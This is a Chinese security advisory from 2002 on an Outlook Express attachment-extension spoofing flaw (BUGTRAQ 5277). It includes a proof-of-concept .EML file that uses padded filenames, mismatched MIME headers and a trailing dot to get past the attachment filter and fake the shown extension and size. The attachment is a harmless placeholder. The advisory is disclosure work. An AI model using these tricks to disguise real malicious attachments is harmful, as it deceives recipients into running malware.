安全研究
安全漏洞
Microsoft Outlook Express可伪造文件扩展名漏洞
发布日期:2002-07-20
更新日期:2002-07-26
受影响系统:
Microsoft Outlook Express 6.0描述:
Microsoft Outlook Express 5.5
Microsoft Outlook Express 5.0
- Microsoft Windows NT 4.0
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000 SP3
BUGTRAQ ID: 5277
Microsoft Outlook Express是一款Microsoft公司开发的流行的EMAIL客户端。
Microsoft Outlook Express没有正确的处理邮件扩展名信息,远程攻击者可以利用这个漏洞伪造附件扩展名,诱使目标用户打开附件。
当邮件中携带的附件如果在文件名和实际扩展名之间包含部分字符的情况下,Microsoft Outlook Express 会错误的限制文件扩展名类型,攻击者可以通过这个漏洞,使.exe文件扩展名看起来是无重大危害的.txt扩展名,如果目标用户在不设防的情况下打开恶意.exe文件,可导致包含恶意代码的文件在用户系统上执行。
<*来源:Matthew Murphy (mattmurphy@kc.rr.com)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
Subject: E-mail
Date: Fri, 19 Jul 2002 23:37:23 -0500
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_007F_01C22F7D.412A3DA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
This is a multi-part message in MIME format.
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
This is a sample .EML exploiting several security issues
in Outlook Express 6.0.
1) Note the file attachment name overflow in the attachment list.
If a user specifies a VERY LONG attachment name, the attachment is
truncated in the "Attachments:" listbox.
NOTE: The number of spaces may require some precision work, so
test often until you get the right number! :-)
2) Note how a .CHM file bypassed the malicious application filter.
Normally, a user would not be allowed to open such a file, and the
file would be disabled by the MUA. However, by using a mismatched
Content-Type/Content-Disposition pair, the filter allows access to
the potentially dangerous CHM file type.
3) Note how the "Open Attachment Warning" dialog displays the filename
when opening the file. The incredibly long ending that we used to
spoof the attachments list is not even displayed, worse, the file name
could inaccurately be displayed as non-malicious (e.g, ASX as here)
4) Note how a specially crafted attachment name allows us to not only
spoof the name in the listbox, but also the size. As the user does
not see the size of the attachment, we can fix this member to a false
value. A typical use for this would be to make the file appear smaller
(safer?) than it really is.
5) Note how the icon is the typical default icon if a "." character is
appended to the end of the filename. OE doesn't parse past the extra
dot, although Windows does.
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: application/octet-stream;
name="NewTitle.asx (132 KB)"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="NewTitle.asx (132 KB)"
This is not a real CHM file, just for the sake of demonstration!
------=_NextPart_000_007F_01C22F7D.412A3DA0
Content-Type: text/plain;
name="ATT00119.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename="ATT00119.txt"
------=_NextPart_000_007F_01C22F7D.412A3DA0--
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 不要随意打开别人发送的附件。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:3188
严重程度:0(网友投票)
绿盟科技给您安全的保障